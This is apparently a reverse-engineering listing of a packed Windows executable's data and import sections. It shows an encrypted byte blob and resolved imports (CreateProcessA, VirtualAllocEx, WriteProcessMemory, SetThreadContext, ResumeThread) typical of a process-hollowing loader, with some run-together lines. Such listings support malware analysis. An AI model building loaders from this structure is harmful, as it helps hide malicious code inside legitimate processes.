dd 2 dup(4001DB78h), 2 dup(4001DB80h), 2 dup(4001DB88h)
dd 2 dup(4001DB90h), 2 dup(4001DB98h), 2 dup(4001DBA0h)
dd 2 dup(4001DBA8h), 2 dup(4001DBB0h), 2 dup(4001DBB8h)
dd 2 dup(4001DBC0h), 2 dup(4001DBC8h), 2 dup(4001DBD0h)
dd 2 dup(4001DBD8h), 2 dup(4001DBE0h), 2 dup(4001DBE8h)
dd 2 dup(4001DBF0h), 2 dup(4001DBF8h), 2 dup(4001DC00h)
dd 2 dup(4001DC08h), 2 dup(4001DC10h), 2 dup(4001DC18h)
dd 2 dup(4001DC20h), 2 dup(4001DC28h), 2 dup(4001DC30h)
dd 2 dup(4001DC38h), 2 dup(4001DC40h), 2 dup(4001DC48h)
dd 2 dup(4001DC50h), 2 dup(4001DC58h), 2 dup(4001DC60h)
dd 2 dup(4001DC68h), 2 dup(4001DC70h), 2 dup(4001DC78h)
dd 2 dup(4001DC80h), 2 dup(4001DC88h), 2 dup(4001DC90h)
dd 2 dup(4001DC98h), 2 dup(4001DCA0h), 2 dup(4001DCA8h)
dd 2 dup(4001DCB0h), 2 dup(4001DCB8h), 2 dup(4001DCC0h)
dd 2 dup(4001DCC8h), 2 dup(4001DCD0h), 2 dup(4001DCD8h)
dd 2 dup(4001DCE0h), 2 dup(4001DCE8h), 2 dup(4001DCF0h)
dd 2 dup(4001DCF8h), 2 dup(4001DD00h), 2 dup(4001DD08h)
dd 2 dup(4001DD10h), 2 dup(4001DD18h), 2 dup(4001DD20h)
dd 2 dup(4001DD28h), 2 dup(4001DD30h), 2 dup(4001DD38h)
dd 2 dup(4001DD40h), 2 dup(4001DD48h), 2 dup(4001DD50h)
dd 2 dup(4001DD58h), 2 dup(4001DD60h), 2 dup(4001DD68h)
dd 2 dup(4001DD70h), 2 dup(4001DD78h), 2 dup(4001DD80h)
dd 2 dup(4001DD88h), 2 dup(4001DD90h), 2 dup(4001DD98h)
dd 2 dup(4001DDA0h), 2 dup(4001DDA8h), 2 dup(4001DDB0h)
dd 2 dup(4001DDB8h), 2 dup(4001DDC0h), 2 dup(4001DDC8h)
dd 2 dup(4001DDD0h), 2 dup(4001DDD8h), 2 dup(4001DDE0h)
dd 2 dup(4001DDE8h), 2 dup(4001DDF0h), 2 dup(4001DDF8h)
dd 2 dup(4001DE00h), 2 dup(4001DE08h), 2 dup(4001DE10h)
dd 2 dup(4001DE18h), 2 dup(4001DE20h), 2 dup(4001DE28h)
dd 2 dup(4001DE30h), 2 dup(4001DE38h), 2 dup(4001DE40h)
dd 2 dup(4001DE48h), 2 dup(4001DE50h), 2 dup(4001DE58h)
dd 2 dup(4001DE60h), 2 dup(4001DE68h), 2 dup(4001DE70h)
dd 2 dup(4001DE78h), 2 dup(4001DE80h), 2 dup(4001DE88h)
dd 2 dup(4001DE90h), 2 dup(4001DE98h), 2 dup(4001DEA0h)
dd 2 dup(4001DEA8h), 2 dup(4001DEB0h), 2 dup(4001DEB8h)
dd 2 dup(4001DEC0h), 2 dup(4001DEC8h), 2 dup(4001DED0h)
dd 2 dup(4001DED8h), 2 dup(4001DEE0h), 2 dup(4001DEE8h)
dd 2 dup(4001DEF0h), 2 dup(4001DEF8h), 2 dup(4001DF00h)
dd 2 dup(4001DF08h), 2 dup(4001DF10h), 2 dup(4001DF18h)
dd 2 dup(4001DF20h), 2 dup(4001DF28h), 2 dup(4001DF30h)
dd 2 dup(4001DF38h), 2 dup(4001DF40h), 2 dup(4001DF48h)
dd 2 dup(4001DF50h), 2 dup(4001DF58h), 2 dup(4001DF60h)
dd 2 dup(4001DF68h), 2 dup(4001DF70h), 2 dup(4001DF78h)
dd 2 dup(4001DF80h), 2 dup(4001DF88h), 2 dup(4001DF90h)
dd 2 dup(4001DF98h), 2 dup(4001DFA0h), 2 dup(4001DFA8h)
dd 2 dup(4001DFB0h), 2 dup(4001DFB8h), 2 dup(4001DFC0h)
dd 2 dup(4001DFC8h), 2 dup(4001DFD0h), 2 dup(4001DFD8h)
dd 2 dup(4001DFE0h), 2 dup(4001DFE8h), 2 dup(4001DFF0h)
dd 2 dup(4001DFF8h), 2 dup(4001E000h), 2 dup(4001E008h)
dd 2 dup(4001E010h), 2 dup(4001E018h), 2 dup(4001E020h)
dd 2 dup(4001E028h), 2 dup(4001E030h), 2 dup(4001E038h)
dd 2 dup(4001E040h), 2 dup(4001E048h), 2 dup(4001E050h)
dd 2 dup(4001E058h), 2 dup(4001E060h), 2 dup(4001E068h)
dd 2 dup(4001E070h), 2 dup(4001E078h), 2 dup(4001E080h)
dd 2 dup(4001E088h), 2 dup(4001E090h), 2 dup(4001E098h)
dd 2 dup(4001E0A0h), 2 dup(4001E0A8h), 2 dup(4001E0B0h)
dd 2 dup(4001E0B8h), 2 dup(4001E0C0h), 2 dup(4001E0C8h)
dd 2 dup(4001E0D0h), 2 dup(4001E0D8h), 2 dup(4001E0E0h)
dd 2 dup(4001E0E8h), 2 dup(4001E0F0h), 2 dup(4001E0F8h)
dd 2 dup(4001E100h), 2 dup(4001E108h), 2 dup(4001E110h)
dd 2 dup(4001E118h), 2 dup(4001E120h), 2 dup(4001E128h)
dd 2 dup(4001E130h), 2 dup(4001E138h), 2 dup(4001E140h)
dd 2 dup(4001E148h), 2 dup(4001E150h), 2 dup(4001E158h)
dd 2 dup(4001E160h), 2 dup(4001E168h), 2 dup(4001E170h)
dd 2 dup(4001E178h), 2 dup(4001E180h), 2 dup(4001E188h)
dd 2 dup(4001E190h), 2 dup(4001E198h), 2 dup(4001E1A0h)
dd 2 dup(4001E1A8h), 2 dup(4001E1B0h), 2 dup(4001E1B8h)
dd 2 dup(4001E1C0h), 2 dup(4001E1C8h), 2 dup(4001E1D0h)
dd 2 dup(4001E1D8h), 2 dup(4001E1E0h), 2 dup(4001E1E8h)
dd 2 dup(4001E1F0h), 2 dup(4001E1F8h), 2 dup(4001E200h)
dd 2 dup(4001E208h), 2 dup(4001E210h), 2 dup(4001E218h)
dd 2 dup(4001E220h), 2 dup(4001E228h), 2 dup(4001E230h)
dd 2 dup(4001E238h), 2 dup(4001E240h), 2 dup(4001E248h)
dd 2 dup(4001E250h), 2 dup(4001E258h), 2 dup(4001E260h)
dd 2 dup(4001E268h), 2 dup(4001E270h), 2 dup(4001E278h)
dd 2 dup(4001E280h), 2 dup(4001E288h), 2 dup(4001E290h)
dd 2 dup(4001E298h), 2 dup(4001E2A0h), 2 dup(4001E2A8h)
dd 2 dup(4001E2B0h), 2 dup(4001E2B8h), 2 dup(4001E2C0h)
dd 2 dup(4001E2C8h), 2 dup(4001E2D0h), 2 dup(4001E2D8h)
dd 2 dup(4001E2E0h), 2 dup(4001E2E8h), 2 dup(4001E2F0h)
dd 2 dup(4001E2F8h), 2 dup(4001E300h), 2 dup(4001E308h)
dd 2 dup(4001E310h), 2 dup(4001E318h), 2 dup(4001E320h)
dd 2 dup(4001E328h), 2 dup(4001E330h), 2 dup(4001E338h)
dd 2 dup(4001E340h), 2 dup(4001E348h), 2 dup(4001E350h)
dd 2 dup(4001E358h), 2 dup(4001E360h), 2 dup(4001E368h)
dd 2 dup(4001E370h), 2 dup(4001E378h), 2 dup(4001E380h)
dd 2 dup(4001E388h), 2 dup(4001E390h), 2 dup(4001E398h)
dd 2 dup(4001E3A0h), 2 dup(4001E3A8h), 2 dup(4001E3B0h)
dd 2 dup(4001E3B8h), 2 dup(4001E3C0h), 2 dup(4001E3C8h)
dd 2 dup(4001E3D0h), 2 dup(4001E3D8h), 2 dup(4001E3E0h)
dd 2 dup(4001E3E8h), 2 dup(4001E3F0h), 2 dup(4001E3F8h)
dd 2 dup(4001E400h), 2 dup(4001E408h), 2 dup(4001E410h)
dd 2 dup(4001E418h), 2 dup(4001E420h), 2 dup(4001E428h)
dd 2 dup(4001E430h), 2 dup(4001E438h), 2 dup(4001E440h)
dd 2 dup(4001E448h), 2 dup(4001E450h), 2 dup(4001E458h)
dd 2 dup(4001E460h), 2 dup(4001E468h), 2 dup(4001E470h)
dd 2 dup(4001E478h), 2 dup(4001E480h), 2 dup(4001E488h)
dd 2 dup(4001E490h), 2 dup(4001E498h), 2 dup(4001E4A0h)
dd 2 dup(4001E4A8h), 2 dup(4001E4B0h), 2 dup(4001E4B8h)
dd 2 dup(4001E4C0h), 2 dup(4001E4C8h), 2 dup(4001E4D0h)
dd 2 dup(4001E4D8h), 2 dup(4001E4E0h), 2 dup(4001E4E8h)
dd 2 dup(4001E4F0h), 2 dup(4001E4F8h), 2 dup(4001E500h)
dd 2 dup(4001E508h), 2 dup(4001E510h), 2 dup(4001E518h)
dd 2 dup(4001E520h), 2 dup(4001E528h), 2 dup(4001E530h)
dd 2 dup(4001E538h), 2 dup(4001E540h), 2 dup(4001E548h)
dd 2 dup(4001E550h), 2 dup(4001E558h), 2 dup(4001E560h)
dd 2 dup(4001E568h), 2 dup(4001E570h), 2 dup(4001E578h)
dd 2 dup(4001E580h), 2 dup(4001E588h), 2 dup(4001E590h)
dd 2 dup(4001E598h), 2 dup(4001E5A0h), 2 dup(4001E5A8h)
dd 2 dup(4001E5B0h), 2 dup(4001E5B8h), 2 dup(4001E5C0h)
dd 2 dup(4001E5C8h), 2 dup(4001E5D0h), 2 dup(4001E5D8h)
dd 2 dup(4001E5E0h), 2 dup(4001E5E8h), 2 dup(4001E5F0h)
dd 2 dup(4001E5F8h), 2 dup(4001E600h), 2 dup(4001E608h)
dd 2 dup(4001E610h), 2 dup(4001E618h), 2 dup(4001E620h)
dd 2 dup(4001E628h), 2 dup(4001E630h), 2 dup(4001E638h)
dd 2 dup(4001E640h), 2 dup(4001E648h), 2 dup(4001E650h)
dd 2 dup(4001E658h), 2 dup(4001E660h), 2 dup(4001E668h)
dd 2 dup(4001E670h), 2 dup(4001E678h), 2 dup(4001E680h)
dd 2 dup(4001E688h), 2 dup(4001E690h), 2 dup(4001E698h)
dd 2 dup(4001E6A0h), 2 dup(4001E6A8h), 2 dup(4001E6B0h)
dd 2 dup(4001E6B8h), 2 dup(4001E6C0h), 2 dup(4001E6C8h)
dd 2 dup(4001E6D0h), 2 dup(4001E6D8h), 2 dup(4001E6E0h)
dd 2 dup(4001E6E8h), 2 dup(4001E6F0h), 2 dup(4001E6F8h)
dd 2 dup(4001E700h), 2 dup(4001E708h), 2 dup(4001E710h)
dd 2 dup(4001E718h), 2 dup(4001E720h), 2 dup(4001E728h)
dd 2 dup(4001E730h), 2 dup(4001E738h), 2 dup(4001E740h)
dd 2 dup(4001E748h), 2 dup(4001E750h), 2 dup(4001E758h)
dd 2 dup(4001E760h), 2 dup(4001E768h), 2 dup(4001E770h)
dd 2 dup(4001E778h), 2 dup(4001E780h), 2 dup(4001E788h)
dd 2 dup(4001E790h), 2 dup(4001E798h), 2 dup(4001E7A0h)
byte_4001E7A8 db 0 ; DATA XREF: sub_40001654+12�o
; sub_40001654:loc_4000167F�o ...
align 4
dword_4001E7AC dd 7FF60000h ; sub_40002540:loc_4000266A�o ...
dword_4001E7B0 dd 7FEA0000h ; sub_40001694+46�w ...
dd 2 dup(0)
dword_4001E7BC dd 0 ; sub_400022F0+59�w ...
byte_4001E7C0 db 0 ; DATA XREF: sub_400022F0+12�o
; sub_400022F0:loc_4000231B�o ...
align 4
dword_4001E7C4 dd 0 ; sub_40002BB4+9�r ...
dword_4001E7C8 dd 0 ; sub_40004790+4�o
dword_4001E7CC dd 12FFB4h ; sub_400044F0+2�r
off_4001E7D0 dd offset dword_4001830C ; DATA XREF: sub_40004518+6�r
; sub_4000457C+7�r ...
dword_4001E7D4 dd 1Bh ; sub_40004518+2B�w ...
off_4001E7D8 dd offset dword_4001A7B4 ; DATA XREF: sub_400045E4+20�w
dd 6 dup(0)
byte_4001E7F4 db 0 ; DATA XREF: sub_40006428�r
byte_4001E7F5 db 0 ; DATA XREF: sub_400190AC+2E�r
align 4
dword_4001E7F8 dd 40000000h ; sub_40006474+16�r ...
dword_4001E7FC dd 0 dword_4001E800 dd 0FFFFFFFFh ; .itext:loc_40019098�w
dword_4001E804 dd 0 ; sub_40006758+22�r ...
dword_4001E808 dd 0A24E58h ; sub_4000BE64+52�o ...
byte_4001E80C db 0 ; DATA XREF: sub_40008800+24�r
; sub_4000BE64+7B�w
byte_4001E80D db 0 ; DATA XREF: sub_40008800+2C�r
; sub_4000BE64+9F�w
byte_4001E80E db 2Ch ; DATA XREF: sub_40008800+14�r
; sub_4000BE64+B2�w
byte_4001E80F db 2Eh ; DATA XREF: sub_40008800+C�r
; sub_40008D00+14�r ...
byte_4001E810 db 2 ; DATA XREF: sub_4000843E+1F9�r
; sub_4000BE64+E9�w
byte_4001E811 db 2Fh ; DATA XREF: sub_400096A8:loc_40009D5B�r
; sub_400096A8+6C4�o ...
align 4
dword_4001E814 dd 0A2C230h ; sub_400096A8+660�r ...
dword_4001E818 dd 0A3A858h ; sub_4000BE64+151�o ...
byte_4001E81C db 3Ah ; DATA XREF: sub_400096A8:loc_40009D7E�r
; sub_400096A8+6E3�o ...
align 10h
dword_4001E820 dd 0A24E98h ; sub_4000A1CC+299�r ...
dword_4001E824 dd 0A24EA8h ; sub_4000A1CC+2C3�r ...
dword_4001E828 dd 0A2C248h ; sub_4000A1CC+24D�r ...
dword_4001E82C dd 0A3A878h ; sub_400096A8+4A7�r ...
dword_4001E830 dd 0A24D18h, 0A24D28h, 0A24D38h, 0A24D48h, 0A24D58h, 0A24D78h
; DATA XREF: sub_4000A91C+29�o
; sub_4000CC50+9F�o
dd 0A24D88h, 0A24D98h, 0A24DA8h, 0A24DB8h, 0A24DC8h
dword_4001E85C dd 0A24DD8h dword_4001E860 dd 0A2C080h, 0A2C098h, 0A2C0B0h, 0A2C0C8h, 0A24D68h, 0A2C0E0h
; DATA XREF: sub_4000A91C+2E�o
; sub_4000CC50+B4�o
dd 0A2C0F8h, 0A2C110h, 0A2C128h, 0A2C140h, 0A2C158h
dword_4001E88C dd 0A2C170h ; sub_400096A8+629�r
dword_4001E890 dd 0A24DE8h, 0A24DF8h, 0A24E08h, 0A24E18h, 0A24E28h, 0A24E38h
; DATA XREF: sub_4000A91C+8A�o
; sub_4000CC50+C9�o
dword_4001E8A8 dd 0A24E48h ; sub_400096A8+5E3�r
dword_4001E8AC dd 0A2C188h, 0A2C1A0h, 0A2C1B8h, 0A2C1D0h, 0A2C1E8h, 0A2C200h
; DATA XREF: sub_4000A91C+8F�o
; sub_4000CC50+DE�o
dd 0A2C218h
dword_4001E8C8 dd 409h dword_4001E8CC dd 9 ; sub_4000A170+6�r ...
dword_4001E8D0 dd 1 dword_4001E8D4 dd 2C0100h ; sub_4000AA40:loc_4000AA54�r ...
dword_4001E8D8 dd 6 dup(0) ; sub_4000CC50+F3�o
dword_4001E8F0 dd 0 ; sub_4000AA7C+43�w
dword_4001E8F4 dd 0 ; sub_4000A1CC+A6�r ...
dd 6 dup(0)
dword_4001E910 dd 0 ; sub_40007E2C+10�o ...
dword_4001E914 dd 0 ; sub_40007E2C+47�o ...
dword_4001E918 dd 0FFFFFFFFh ; sub_400190AC+11�w
dword_4001E91C dd 0A2C048h ; sub_4000B72C+12�w ...
dword_4001E920 dd 0A2C060h ; sub_4000B72C+29�w ...
byte_4001E924 db 0 ; DATA XREF: sub_4000C230+CB�r
; sub_4000C230+F3�r ...
align 4
dd 3Fh dup(0)
dword_4001EA24 dd 100h dup(0) dword_4001EE24 dd 100h dup(0) dword_4001F224 dd 0 dword_4001F228 dd 77126AEAh ; .data:off_4001B064�o
dword_4001F22C dd 771993C5h dword_4001F230 dd 7713C84Ah dword_4001F234 dd 7713A795h dword_4001F238 dd 7713B747h dword_4001F23C dd 77199F08h dword_4001F240 dd 7713BF93h dword_4001F244 dd 7719ABC6h dword_4001F248 dd 7719AD1Ah dword_4001F24C dd 7713A911h dword_4001F250 dd 7713B999h dword_4001F254 dd 7719A9F4h dword_4001F258 dd 77139F38h dword_4001F25C dd 7714F193h ; .data:off_4001B0B0�o
dword_4001F260 dd 7714F33Ch dword_4001F264 dd 7713C5FAh ; .data:off_4001AFF0�o
dword_4001F268 dd 7716D9A8h ; .data:off_4001AF3C�o
dword_4001F26C dd 77162626h ; .data:off_4001B0A0�o
dword_4001F270 dd 77150154h ; .data:off_4001AFC0�o
dword_4001F274 dd 7716386Bh ; .data:off_4001AF04�o
dword_4001F278 dd 7714521Ah ; .data:off_4001AFC8�o
dword_4001F27C dd 771500F2h ; .data:off_4001B058�o
dword_4001F280 dd 0FFFFFFFFh dword_4001F284 dd 0Ah, 0 ; sub_40019144+1A�o
dd 80020004h, 0
off_4001F294 dd offset sub_400166E8 ; DATA XREF: sub_40019144+29�w
; .data:off_4001B02C�o
off_4001F298 dd offset sub_4000DC90 ; DATA XREF: sub_4000E35C+3A�r
; sub_40019144+33�w
off_4001F29C dd offset sub_4000DBA0 ; DATA XREF: sub_4000E744+33�r
; sub_4000ECE8+2D�r ...
off_4001F2A0 dd offset sub_4000DC90 ; DATA XREF: sub_4000E654+5D�r
; sub_40019144+43�w
dword_4001F2A4 dd 0FFFFFFFFh ; sub_40019144+11�w
dword_4001F2A8 dd 0 ; sub_40012C6C+38�r ...
dword_4001F2AC dd 146F68h, 0FFFFFFFFh, 4 dup(0) ; sub_40012AF4:loc_40012B4A�o ...
dword_4001F2C4 dd 0FFFFFFFFh ; .itext:loc_400191F0�w
dword_4001F2C8 dd 0A333FCh ; sub_40013ED4+5F�o ...
dword_4001F2CC dd 48h ; sub_40013E14+1F�r ...
dword_4001F2D0 dd 0FFFFFFFFh ; sub_400191F8+11�w
dword_4001F2D4 dd 0A41B78h ; sub_40013E60+6�r ...
dword_4001F2D8 dd 0A41B50h ; sub_40013510+20�r ...
dword_4001F2DC dd 0 dword_4001F2E0 dd 0A41BA0h ; sub_40013CE4+1C�r ...
dword_4001F2E4 dd 146F90h, 0FFFFFFFFh, 4 dup(0) ; sub_40013E48�o
dword_4001F2FC dd 0FFFFFFFFh ; .itext:loc_4001928C�w
dword_4001F300 dd 0FFFFFFFFh ; .itext:loc_40019294�w
dword_4001F304 dd 9F0804B2h dword_4001F308 dd 0FFFFFFFFh ; .itext:4001929E�o
dd 60h
dword_4001F310 dd 1B00017h ; .itext:400192C8�r
dword_4001F314 dd 1900015h ; .itext:400192D4�r
dword_4001F318 dd 18A0021h ; sub_40015918+14�r ...
dword_4001F31C dd 10003h dword_4001F320 dd 145BA8h, 0FFFFFFFFh, 4 dup(0) ; .itext:400192AF�o
dword_4001F338 dd 145BD0h, 0FFFFFFFFh, 4 dup(0) ; sub_40015358+10�o ...
dword_4001F350 dd 0A41BC8h ; sub_40014F8C:loc_40015175�r ...
dword_4001F354 dd 0A41BF0h ; sub_400151D0:loc_4001524B�r ...
dword_4001F358 dd 0A41C18h ; sub_40015270:loc_40015333�r ...
dword_4001F35C dd 0A41C90h ; .itext:40019369�w
dword_4001F360 dd 0A41C40h dword_4001F364 dd 0FFFFFFFFh ; .itext:loc_40019398�w
byte_4001F368 db 0 ; DATA XREF: sub_40016AB0+19�w
align 4
dword_4001F36C dd 0 dword_4001F370 dd 0 ; sub_40016A34+9�r ...
byte_4001F374 db 0 ; DATA XREF: sub_40016A34+37�w
; sub_40016A34+76�w ...
align 4
dword_4001F378 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThread ; sub_40017A1C+2FE�r
dword_4001F37C dd 7C862A69h ; resolved to->KERNEL32.SetThreadContext ; sub_40017A1C+2F4�r
dword_4001F380 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocEx ; sub_40017A1C+293�r
dword_4001F384 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_40017A1C+277�r
dword_4001F388 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContext ; sub_40017A1C+259�r
dword_4001F38C dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_40017A1C+1F9�r ...
dword_4001F390 dd 7C8260C2h ; resolved to->KERNEL32.FreeResourcedword_4001F394 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_4001F398 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_4001F39C dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_4001F3A0 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4001F3A4 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_400173FC+29B�r
dword_4001F3A8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; sub_40017A1C+2B0�r ...
dword_4001F3AC dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40017A1C+66�r ...
dword_4001F3B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4001F3B4 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_40017D84+45�r
dword_4001F3B8 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_40017D84+54�r ...
dword_4001F3BC dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_40017D84+67�r ...
dword_4001F3C0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_40017D84+F1�r
dword_4001F3C4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_40017D84+13C�r ...
dword_4001F3C8 dd 3Fh dup(0) ; sub_40016FD8+58�o
dd 8A000000h
byte_4001F4C8 db 31h ; DATA XREF: sub_40016FD8+2D�o
; sub_40016FD8+53�o ...
db 0C9h, 5, 7Ah
dd 8D1D5303h, 7208B9F2h, 9AED189h, 0E5AF81FBh, 4DE21944h
dd 0B05F0E32h, 0DA33A648h, 0E911CF88h, 0D9287B55h, 0E08C2DD8h
dd 4CB446A1h, 0CDF9F1ABh, 4A39E52h, 4F5163A9h, 0F791DD17h
dd 0CEB3E342h, 0FC3483BEh, 0E8CB1EC6h, 0A7EEAD12h, 60953C5Eh
dd 0FAA0BF39h, 7E400C0h, 0DEDB8A92h, 0C24A930Fh, 715C7037h
dd 9C9DB764h, 670B245Ah, 699A2694h, 9B66301Fh, 8062477Ch
dd 0D32FB61Bh, 75FD61DCh, 0ACC4A4D4h, 0EBA20179h, 5D6F495Bh
dd 3DAA1836h, 6CC43BCh, 54F6788Eh, 0A816BAE1h, 4E73BB15h
dd 6835D20Dh, 8B7E87EAh, 0BDE66A22h, 29F4CAD5h, 20B1D674h
dd 97029977h, 65C558C8h, 507F0AF0h, 45C382B5h, 3E57FF59h
dd 0EF8F1AEDh, 0FE902C6Ch, 0C198409Fh, 6D1C106Bh, 863B13F3h
dd 0CB8E7DFh, 0A596844Bh, 0D038C776h, 562B3AB2h, 25218527h
dd 0F8D723F5h, 6E14EC3Fh, 2E7D412Ah
dword_4001F5C8 dd 7FF00010h ; .itext:4001982D�r ...
dword_4001F5CC dd 0 ; .itext:400198A3�o ...
dword_4001F5D0 dd 0 ; .itext:400198C2�r ...
dword_4001F5D4 dd 42h dup(0) ; .itext:40019907�o
dword_4001F6DC dd 0 ; .itext:40019A45�r
dword_4001F6E0 dd 2 ; sub_40017F10+17�r ...
dword_4001F6E4 dd 4002B378h, 4 dup(0)dword_4001F6F8 dd 53h dup(0) ; .itext:400199E6�o ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: .itext:4001956E�o
; .itext:40019584�o ...
align 10h
dd 3Bh dup(0)
dword_4001F94C dd 0 ; .itext:400195CA�o ...
dword_4001F950 dd 0A24EB8h ; .itext:40019673�o ...
dword_4001F954 dd 0A1DA68h ; .itext:400196DF�o ...
dword_4001F958 dd 7FEA0018h ; .itext:40019713�o ...
dword_4001F95C dd 27511h ; .itext:40019707�o ...
dword_4001F960 dd 4200h ; .itext:400195AD�r
dword_4001F964 dd 10h dup(0) ; .itext:400195D6�o
db 0
byte_4001F9A5 db 49h, 5Ah, 4Ah ; DATA XREF: .itext:40019635�o
dd 0Ah dup(0)
db 2 dup(0)
word_4001F9D2 dw 0 ; DATA XREF: .itext:40019865�o
dd 0Fh dup(0)
db 3 dup(0)
byte_4001FA13 db 5Dh ; DATA XREF: .itext:4001963F�o
dd 574D4126h, 7F515549h, 4C454454h, 77595B4Dh, 0F594862h
dd 58515060h, 17515B5Dh, 534E5C75h, 4F625953h, 266B7569h
dd 527D102Dh, 1E534D51h, 59751815h, 56480258h, 4Ah, 1031h dup(0)
dword_40023B14 dd 0 dd 0
dword_40023B1C dd 0 ; .itext:400195DB�r ...
dd 0
dword_40023B24 dd 3, 9 dup(0) dword_40023B4C dd 1Bh ; .itext:4001968E�r ...
dword_40023B50 dd 0 ; .itext:40019688�r ...
dword_40023B54 dd 3Fh ; .itext:4001969A�r ...
dword_40023B58 dd 0 ; .itext:40019694�r ...
byte_40023B5C db 1 ; DATA XREF: .itext:loc_400197E0�r
byte_40023B5D db 1 ; DATA XREF: .itext:400197AE�r
align 10h
dd 0
dword_40023B64 dd 0 ; .itext:40019630�w ...
aCWindowsSyst_0 db 'C:\WINDOWS\system32',0 ; DATA XREF: .itext:40019498�o
; .itext:400194D1�o ...
dd 3Bh dup(0)
dword_40023C68 dd 0 dword_40023C6C dd 0 dword_40023C70 dd 0 dword_40023C74 dd 0 dword_40023C78 dd 0 ; .itext:40019457�r
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: .itext:40019428�o
; .itext:40019437�o
dd 6Dh dup(0)
aIfb db '¨f¡',0 ; DATA XREF: .itext:40019432�o
; .itext:40019446�o
dword_40023E48 dd 27511h ; .itext:40019736�r ...
dword_40023E4C dd 55000h ; .itext:4001980B�r ...
dword_40023E50 dd 0 ; .itext:400199FF�r ...
align 200h
_bss ends
; Section 5. (virtual address 00024000)
; Virtual size : 00001134 ( 4404.)
; Section size in file : 00001134 ( 4404.)
; Offset to raw data for section: 00024000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 40024000h
dd 24140h, 2 dup(0)
dd 24678h, 243DCh, 24150h, 2 dup(0)
dd 246C0h, 243ECh, 24160h, 2 dup(0)
dd 24700h, 243FCh, 24178h, 2 dup(0)
dd 24756h, 24414h, 24218h, 2 dup(0)
dd 249F4h, 244B4h, 2422Ch, 2 dup(0)
dd 24A40h, 244C8h, 24254h, 2 dup(0)
dd 24AC4h, 244F0h, 242A4h, 2 dup(0)
dd 24C12h, 24540h, 24368h, 2 dup(0)
dd 24F64h, 24604h, 24388h, 2 dup(0)
dd 24FE6h, 24624h, 24394h, 2 dup(0)
dd 25014h, 24630h, 243A0h, 2 dup(0)
dd 25040h, 2463Ch, 243A8h, 2 dup(0)
dd 25056h, 24644h, 243CCh, 2 dup(0)
dd 250F8h, 24668h, 243D4h, 2 dup(0)
dd 25118h, 24670h, 5 dup(0)
dd 24686h, 24696h, 246ACh, 0
dd 246CEh, 246E2h, 246F2h, 0
dd 2470Ch, 2471Eh, 2472Eh, 2473Ch, 2474Ah, 0
dd 24764h, 2476Eh, 24776h, 24784h, 24794h, 247A4h, 247BEh
dd 247D4h, 247ECh, 24804h, 24814h, 2482Ah, 24840h, 2484Ch
dd 24858h, 2486Ah, 2487Ch, 2488Eh, 248A0h, 248B4h, 248CAh
dd 248DCh, 248ECh, 248FEh, 2490Ch, 2491Eh, 2492Ah, 24938h
dd 24944h, 24960h, 24972h, 24982h, 2498Eh, 2499Ah, 249ACh
dd 249BCh, 249CAh, 249D8h, 249E6h, 0
dd 24A02h, 24A10h, 24A1Eh, 24A2Ch, 0
dd 24A4Ch, 24A58h, 24A66h, 24A74h, 24A80h, 24A94h, 24AA2h
dd 24AAAh, 24AB6h, 0
dd 24ACEh, 24AE0h, 24AF0h, 24AFAh, 24B06h, 24B14h, 24B24h
dd 24B34h, 24B40h, 24B52h, 24B6Ch, 24B7Eh, 24B8Eh, 24BA6h
dd 24BB6h, 24BC2h, 24BD6h, 24BE6h, 24BFCh, 0
dd 24C20h, 24C3Eh, 24C4Ah, 24C54h, 24C6Ah, 24C7Ah, 24C82h
dd 24C94h, 24CA6h, 24CB2h, 24CC0h, 24CCCh, 24CE2h, 24CECh
dd 24CFCh, 24D0Ch, 24D1Ch, 24D34h, 24D50h, 24D60h, 24D70h
dd 24D82h, 24D92h, 24DA8h, 24DB8h, 24DCAh, 24DDEh, 24DF4h
dd 24E06h, 24E16h, 24E26h, 24E40h, 24E54h, 24E66h, 24E7Ch
dd 24E88h, 24E98h, 24EA6h, 24EB8h, 24EC8h, 24ED6h, 24EEAh
dd 24F02h, 24F1Ah, 24F28h, 24F38h, 24F44h, 24F56h, 0
dd 24F72h, 24F84h, 24F98h, 24FA8h, 24FB6h, 24FC8h, 24FD6h
dd 0
dd 24FF4h, 25004h, 0
dd 2501Eh, 25030h, 0
dd 2504Eh, 0
dd 25064h, 2507Ah, 25090h, 250A6h, 250B8h, 250CCh, 250DAh
dd 250EAh, 0
dd 25102h, 0
dd 25124h, 0
dword_400243DC dd 77124880h dword_400243E0 dd 771544ADh dword_400243E4 dd 77124BA7h dd 0
dword_400243EC dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_400243F0 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_400243F4 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey dd 0
dword_400243FC dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_40024400 dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_40024404 dd 7E42DFA8h ; resolved to->USER32.LoadStringAdword_40024408 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_4002440C dd 7E42DF50h ; resolved to->USER32.CharNextA dd 0
